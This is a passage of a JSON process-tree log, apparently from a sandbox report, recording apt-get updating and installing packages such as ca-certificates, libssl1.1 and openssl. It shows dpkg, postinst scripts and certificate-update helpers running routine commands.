"/usr/sbin/update-ca-certificates", "pid": 20360, "command_line_args": "update-ca-certificates", "child_processes": [ { "process_name": "/bin/rm", "pid": 21048, "command_line_args": "rm -f /tmp/ca-certificates.crt.tmp.hX" }, { "process_name": "/bin/rm", "pid": 21050, "command_line_args": "rm -f /tmp/ca-certificates.tmp.gknR3i" }, { "process_name": "/bin/mv", "pid": 21044, "command_line_args": "mv -f /tmp/ca-certificates.crt.tmp.hX ca-certificates.crt" }, { "process_name": "/usr/bin/find", "pid": 21037, "command_line_args": "find -L /usr/local/share/ca-certificate -type" }, { "process_name": "/bin/rm", "pid": 21049, "command_line_args": "rm -f /tmp/ca-certificates.tmp.wt9MFk" }, { "process_name": "/usr/bin/sort", "pid": 21038, "command_line_args": "sort" }, { "process_name": "/usr/bin/wc", "pid": 21042, "command_line_args": "wc -l" }, { "process_name": "/bin/chmod", "pid": 21043, "command_line_args": "chmod 0644 /tmp/ca-certificates.crt.tmp.hX" }, { "process_name": "/usr/bin/wc", "pid": 21041, "command_line_args": "wc -l" }, { "process_name": "/bin/rm", "pid": 21040, "command_line_args": "rm -f ca-certificates.crt" }, { "process_name": "/bin/mktemp", "pid": 20362, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" }, { "process_name": "/bin/sed", "pid": 20366, "command_line_args": "sed -e /^$/d -e" }, { "process_name": "/bin/sed", "pid": 20364, "command_line_args": "sed -n -e /^$/d" }, { "process_name": "/bin/mktemp", "pid": 20361, "command_line_args": "mktemp -t ca-certificates.crt.tmp.XXXXXX" }, { "process_name": "/bin/mktemp", "pid": 20363, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" } ] } ] }, { "process_name": "/var/lib/dpkg/info/libc-bin.postinst", "pid": 20357, "command_line_args": "/var/lib/dpkg/info/libc-bin.pos triggered ldconfig", "child_processes": [ { "process_name": "/sbin/ldconfig.real", "pid": 20358, "command_line_args": "/sbin/ldconfig.real" }, { "process_name": "/sbin/ldconfig.real", "pid": 20358, "command_line_args": "/sbin/ldconfig.real" } ] }, { "process_name": "/var/lib/dpkg/info/ca-certificates.postinst", "pid": 18722, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/var/lib/dpkg/info/ca-certificates.postinst", "pid": 19557, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/usr/bin/dpkg-trigger", "pid": 20321, "command_line_args": "dpkg-trigger --no-await update-ca-certificates" }, { "process_name": "/bin/chown", "pid": 19563, "command_line_args": "chown 0:0 /usr/local/share/ca-certificate" }, { "process_name": "/usr/bin/stat", "pid": 19561, "command_line_args": "stat -c %u /usr/local" }, { "process_name": "/usr/bin/uniq", "pid": 19570, "command_line_args": "uniq -c" }, { "process_name": "/bin/cat", "pid": 19564, "command_line_args": "cat" }, { "process_name": "/usr/bin/stat", "pid": 19559, "command_line_args": "stat -c %a /usr/local" }, { "process_name": "/usr/bin/stat", "pid": 19562, "command_line_args": "stat -c %g /usr/local" }, { "process_name": "/usr/bin/dpkg", "pid": 19574, "command_line_args": "dpkg --compare-versions lt-nl" }, { "process_name": "/bin/sed", "pid": 19566, "command_line_args": "sed -e s/^[[:space:]]*//" }, { "process_name": "/usr/bin/sort", "pid": 19569, "command_line_args": "sort" }, { "process_name": "/bin/chmod", "pid": 19560, "command_line_args": "chmod 755 /usr/local/share/ca-certificate" }, { "process_name": "/bin/sed", "pid": 19571, "command_line_args": "sed -e s/^[[:space:]]*2[[:space:]]*// -e" }, { "process_name": "/usr/bin/dpkg-statoverride", "pid": 19558, "command_line_args": "dpkg-statoverride --list /usr/local/share/ca-certificate" }, { "process_name": "/usr/sbin/update-ca-certificates", "pid": 19575, "command_line_args": "update-ca-certificates --hooksdir", "child_processes": [ { "process_name": "/bin/rm", "pid": 20312, "command_line_args": "rm -f ca-certificates.crt" }, { "process_name": "/bin/rm", "pid": 20318, "command_line_args": "rm -f /tmp/ca-certificates.crt.tmp.fC" }, { "process_name": "/usr/bin/wc", "pid": 20314, "command_line_args": "wc -l" }, { "process_name": "/usr/bin/find", "pid": 20309, "command_line_args": "find -L /usr/local/share/ca-certificate -type" }, { "process_name": "/bin/rm", "pid": 20320, "command_line_args": "rm -f /tmp/ca-certificates.tmp.YnGOXQ" }, { "process_name": "/usr/bin/wc", "pid": 20313, "command_line_args": "wc -l" }, { "process_name": "/bin/mv", "pid": 20317, "command_line_args": "mv -f /tmp/ca-certificates.crt.tmp.fC ca-certificates.crt" }, { "process_name": "/bin/rm", "pid": 20319, "command_line_args": "rm -f /tmp/ca-certificates.tmp.sdKR1D" }, { "process_name": "/usr/bin/sort", "pid": 20310, "command_line_args": "sort" }, { "process_name": "/usr/bin/openssl", "pid": 20315, "command_line_args": "openssl rehash ." }, { "process_name": "/bin/chmod", "pid": 20316, "command_line_args": "chmod 0644 /tmp/ca-certificates.crt.tmp.fC" }, { "process_name": "/bin/sed", "pid": 19580, "command_line_args": "sed -n -e /^$/d" }, { "process_name": "/bin/mktemp", "pid": 19579, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" }, { "process_name": "/bin/mktemp", "pid": 19578, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" }, { "process_name": "/bin/mktemp", "pid": 19577, "command_line_args": "mktemp -t ca-certificates.crt.tmp.XXXXXX" }, { "process_name": "/bin/sed", "pid": 19582, "command_line_args": "sed -e /^$/d -e" } ] } ] }, { "process_name": "/bin/chgrp", "pid": 18726, "command_line_args": "chgrp 0 /usr/local/share/ca-certificate" }, { "process_name": "/usr/bin/stat", "pid": 18723, "command_line_args": "stat -c %a /usr/local" }, { "process_name": "/usr/bin/stat", "pid": 18725, "command_line_args": "stat -c %g /usr/local" }, { "process_name": "/var/lib/dpkg/info/ca-certificates.config", "pid": 18735, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/bin/sed", "pid": 19552, "command_line_args": "sed -e s/^[[:space:]]*//" }, { "process_name": "/bin/grep", "pid": 19554, "command_line_args": "grep -q match" }, { "process_name": "/usr/bin/tr", "pid": 19551, "command_line_args": "tr , \\n" }, { "process_name": "/bin/sed", "pid": 18737, "command_line_args": "sed -e /^#/d -e" }, { "process_name": "/bin/sed", "pid": 18736, "command_line_args": "sed -ne s/^!\\(.*\\)/\\1/p /dev/null" } ] }, { "process_name": "/bin/sh", "pid": 18727, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18728, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18733, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18734, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18729, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18730, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18731, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18732, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/mkdir", "pid": 18724, "command_line_args": "mkdir -m 755 /usr/local/share/ca-certificate" } ] }, { "process_name": "/var/lib/dpkg/info/libssl1.1:amd64.postinst", "pid": 18711, "command_line_args": "/var/lib/dpkg/info/libssl1.1:am configure", "child_processes": [ { "process_name": "/bin/sh", "pid": 18716, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18717, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18712, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18713, "command_line_args": "stty -a" } ] }, { "process_name": "/var/lib/dpkg/info/libssl1.1:amd64.postinst", "pid": 18720, "command_line_args": "/var/lib/dpkg/info/libssl1.1:am configure" }, { "process_name": "/bin/sh", "pid": 18714, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18715, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18718, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18719, "command_line_args": "stty -a" } ] } ] }, { "process_name": "/var/lib/dpkg/info/libssl1.1:amd64.postinst", "pid": 18711, "command_line_args": "/var/lib/dpkg/info/libssl1.1:am configure", "child_processes": [ { "process_name": "/bin/sh", "pid": 18716, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18717, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18712, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18713, "command_line_args": "stty -a" } ] }, { "process_name": "/var/lib/dpkg/info/libssl1.1:amd64.postinst", "pid": 18720, "command_line_args": "/var/lib/dpkg/info/libssl1.1:am configure" }, { "process_name": "/bin/sh", "pid": 18714, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18715, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18718, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18719, "command_line_args": "stty -a" } ] } ] }, { "process_name": "/var/lib/dpkg/info/openssl.postinst", "pid": 18721, "command_line_args": "/var/lib/dpkg/info/openssl.post configure" }, { "process_name": "/var/lib/dpkg/info/ca-certificates.postinst", "pid": 18722, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/var/lib/dpkg/info/ca-certificates.postinst", "pid": 19557, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/usr/bin/dpkg-trigger", "pid": 20321, "command_line_args": "dpkg-trigger --no-await update-ca-certificates" }, { "process_name": "/bin/chown", "pid": 19563, "command_line_args": "chown 0:0 /usr/local/share/ca-certificate" }, { "process_name": "/usr/bin/stat", "pid": 19561, "command_line_args": "stat -c %u /usr/local" }, { "process_name": "/usr/bin/uniq", "pid": 19570, "command_line_args": "uniq -c" }, { "process_name": "/bin/cat", "pid": 19564, "command_line_args": "cat" }, { "process_name": "/usr/bin/stat", "pid": 19559, "command_line_args": "stat -c %a /usr/local" }, { "process_name": "/usr/bin/stat", "pid": 19562, "command_line_args": "stat -c %g /usr/local" }, { "process_name": "/usr/bin/dpkg", "pid": 19574, "command_line_args": "dpkg --compare-versions lt-nl" }, { "process_name": "/bin/sed", "pid": 19566, "command_line_args": "sed -e s/^[[:space:]]*//" }, { "process_name": "/usr/bin/sort", "pid": 19569, "command_line_args": "sort" }, { "process_name": "/bin/chmod", "pid": 19560, "command_line_args": "chmod 755 /usr/local/share/ca-certificate" }, { "process_name": "/bin/sed", "pid": 19571, "command_line_args": "sed -e s/^[[:space:]]*2[[:space:]]*// -e" }, { "process_name": "/usr/bin/dpkg-statoverride", "pid": 19558, "command_line_args": "dpkg-statoverride --list /usr/local/share/ca-certificate" }, { "process_name": "/usr/sbin/update-ca-certificates", "pid": 19575, "command_line_args": "update-ca-certificates --hooksdir", "child_processes": [ { "process_name": "/bin/rm", "pid": 20312, "command_line_args": "rm -f ca-certificates.crt" }, { "process_name": "/bin/rm", "pid": 20318, "command_line_args": "rm -f /tmp/ca-certificates.crt.tmp.fC" }, { "process_name": "/usr/bin/wc", "pid": 20314, "command_line_args": "wc -l" }, { "process_name": "/usr/bin/find", "pid": 20309, "command_line_args": "find -L /usr/local/share/ca-certificate -type" }, { "process_name": "/bin/rm", "pid": 20320, "command_line_args": "rm -f /tmp/ca-certificates.tmp.YnGOXQ" }, { "process_name": "/usr/bin/wc", "pid": 20313, "command_line_args": "wc -l" }, { "process_name": "/bin/mv", "pid": 20317, "command_line_args": "mv -f /tmp/ca-certificates.crt.tmp.fC ca-certificates.crt" }, { "process_name": "/bin/rm", "pid": 20319, "command_line_args": "rm -f /tmp/ca-certificates.tmp.sdKR1D" }, { "process_name": "/usr/bin/sort", "pid": 20310, "command_line_args": "sort" }, { "process_name": "/usr/bin/openssl", "pid": 20315, "command_line_args": "openssl rehash ." }, { "process_name": "/bin/chmod", "pid": 20316, "command_line_args": "chmod 0644 /tmp/ca-certificates.crt.tmp.fC" }, { "process_name": "/bin/sed", "pid": 19580, "command_line_args": "sed -n -e /^$/d" }, { "process_name": "/bin/mktemp", "pid": 19579, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" }, { "process_name": "/bin/mktemp", "pid": 19578, "command_line_args": "mktemp -t ca-certificates.tmp.XXXXXX" }, { "process_name": "/bin/mktemp", "pid": 19577, "command_line_args": "mktemp -t ca-certificates.crt.tmp.XXXXXX" }, { "process_name": "/bin/sed", "pid": 19582, "command_line_args": "sed -e /^$/d -e" } ] } ] }, { "process_name": "/bin/chgrp", "pid": 18726, "command_line_args": "chgrp 0 /usr/local/share/ca-certificate" }, { "process_name": "/usr/bin/stat", "pid": 18723, "command_line_args": "stat -c %a /usr/local" }, { "process_name": "/usr/bin/stat", "pid": 18725, "command_line_args": "stat -c %g /usr/local" }, { "process_name": "/var/lib/dpkg/info/ca-certificates.config", "pid": 18735, "command_line_args": "/var/lib/dpkg/info/ca-certifica configure", "child_processes": [ { "process_name": "/bin/sed", "pid": 19552, "command_line_args": "sed -e s/^[[:space:]]*//" }, { "process_name": "/bin/grep", "pid": 19554, "command_line_args": "grep -q match" }, { "process_name": "/usr/bin/tr", "pid": 19551, "command_line_args": "tr , \\n" }, { "process_name": "/bin/sed", "pid": 18737, "command_line_args": "sed -e /^#/d -e" }, { "process_name": "/bin/sed", "pid": 18736, "command_line_args": "sed -ne s/^!\\(.*\\)/\\1/p /dev/null" } ] }, { "process_name": "/bin/sh", "pid": 18727, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18728, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18733, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18734, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18729, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18730, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/sh", "pid": 18731, "command_line_args": "sh -c stty -a 2>/dev/null", "child_processes": [ { "process_name": "/bin/stty", "pid": 18732, "command_line_args": "stty -a" } ] }, { "process_name": "/bin/mkdir", "pid": 18724, "command_line_args": "mkdir -m 755 /usr/local/share/ca-certificate" } ] } ] }, { "process_name": "/bin/sh", "pid": 18639, "command_line_args": "/bin/sh -c /usr/sbin/dpkg-preconfigure --a", "child_processes": [ { "process_name": "/usr/sbin/dpkg-preconfigure", "pid": 18640, "command_line_args": "/usr/sbin/dpkg-preconfigure --apt" } ] }, { "process_name": "/usr/bin/dpkg", "pid": 18641, "command_line_args": "/usr/bin/dpkg --assert-multi-arch" }, { "process_name": "/usr/bin/dpkg", "pid": 18642, "command_line_args": "/usr/bin/dpkg --status-fd 26 --no-triggers", "child_processes": [ { "process_name": "/usr/bin/dpkg-deb", "pid": 18706, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/6-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18697, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/5-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18693, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/5- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18696, "command_line_args": "tar -x -f -" } ] }, { "process_name": "/bin/rm", "pid": 18691, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/bin/rm", "pid": 18709, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18701, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/6-" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18692, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/5-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18702, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/6- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18705, "command_line_args": "tar -x -f -" } ] }, { "process_name": "/bin/rm", "pid": 18700, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18666, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/2- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18669, "command_line_args": "tar -x -f" } ] }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18670, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/2-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18661, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/1-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18675, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/3- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18678, "command_line_args": "tar -x -f -" } ] }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18644, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/0- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18647, "command_line_args": "tar -x -f" } ] }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18652, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/0-" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18643, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/0-" }, { "process_name": "/var/lib/dpkg/tmp.ci/preinst", "pid": 18648, "command_line_args": "/var/lib/dpkg/tmp.ci/preinst install", "child_processes": [ { "process_name": "/usr/bin/dpkg-maintscript-helper", "pid": 18649, "command_line_args": "dpkg-maintscript-helper rm_conffile /etc/init/cron.conf 3.0pl1-128ubuntu5~", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 18650, "command_line_args": "basename /usr/bin/dpkg-maintscript-helpe" }, { "process_name": "/usr/bin/dpkg", "pid": 18651, "command_line_args": "dpkg --validate-version -- 3.0pl1-128ubuntu5~" } ] } ] }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18688, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/4-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18657, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/1- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18660, "command_line_args": "tar -x -f -" } ] }, { "process_name": "/usr/bin/dpkg-split", "pid": 18674, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/3-" }, { "process_name": "/bin/rm", "pid": 18664, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/bin/rm", "pid": 18673, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18656, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/1-" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18683, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/4-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18679, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/3-" }, { "process_name": "/usr/bin/dpkg-deb", "pid": 18684, "command_line_args": "dpkg-deb /tmp/apt-dpkg-install-mJ3SsB/4- /var/lib/dpkg/tmp.ci", "child_processes": [ { "process_name": "/bin/tar", "pid": 18687, "command_line_args": "tar -x -f -" } ] }, { "process_name": "/bin/rm", "pid": 18655, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/bin/rm", "pid": 18682, "command_line_args": "rm -rf -- /var/lib/dpkg/tmp.ci" }, { "process_name": "/usr/bin/dpkg-split", "pid": 18665, "command_line_args": "dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-mJ3SsB/2-" } ] }, { "process_name": "/usr/lib/apt/methods/http", "pid": 18637, "command_line_args": "/usr/lib/apt/methods/http" }, { "process_name": "/usr/lib/apt/methods/http", "pid": 18636, "command_line_args": "/usr/lib/apt/methods/http" }, { "process_name": "/usr/bin/dpkg", "pid": 18629, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" }, { "process_name": "/usr/bin/dpkg", "pid": 18586, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" }, { "process_name": "/usr/bin/dpkg", "pid": 18585, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" } ] }, { "process_name": "/usr/bin/apt-get", "pid": 18359, "command_line_args": "apt-get update", "child_processes": [ { "process_name": "/usr/bin/dpkg", "pid": 18583, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" }, { "process_name": "/usr/bin/dpkg", "pid": 18582, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" }, { "process_name": "/usr/lib/apt/methods/http", "pid": 18364, "command_line_args": "/usr/lib/apt/methods/http" }, { "process_name": "/usr/lib/apt/methods/store", "pid": 18423, "command_line_args": "/usr/lib/apt/methods/store" }, { "process_name": "/usr/lib/apt/methods/gpgv", "pid": 18368, "command_line_args": "/usr/lib/apt/methods/gpgv" }, { "process_name": "/usr/lib/apt/methods/store", "pid": 18422, "command_line_args": "/usr/lib/apt/methods/store" }, { "process_name": "/usr/bin/dpkg", "pid": 18360, "command_line_args": "/usr/bin/dpkg --print-foreign-architectures" }, { "process_name": "/usr/lib/apt/methods/gpgv", "pid": 18369, "command_line_args": "/usr/lib/apt/methods/gpgv" }, { "process_name": "/usr/lib/apt/methods/http", "pid": 18367, "command_line_args": "/usr/lib/apt/methods/http" }, { "process_name": "/usr/lib/apt/methods/http", "pid": 18365, "command_line_args": "/usr/lib/apt/methods/http" } ] } ] } ] }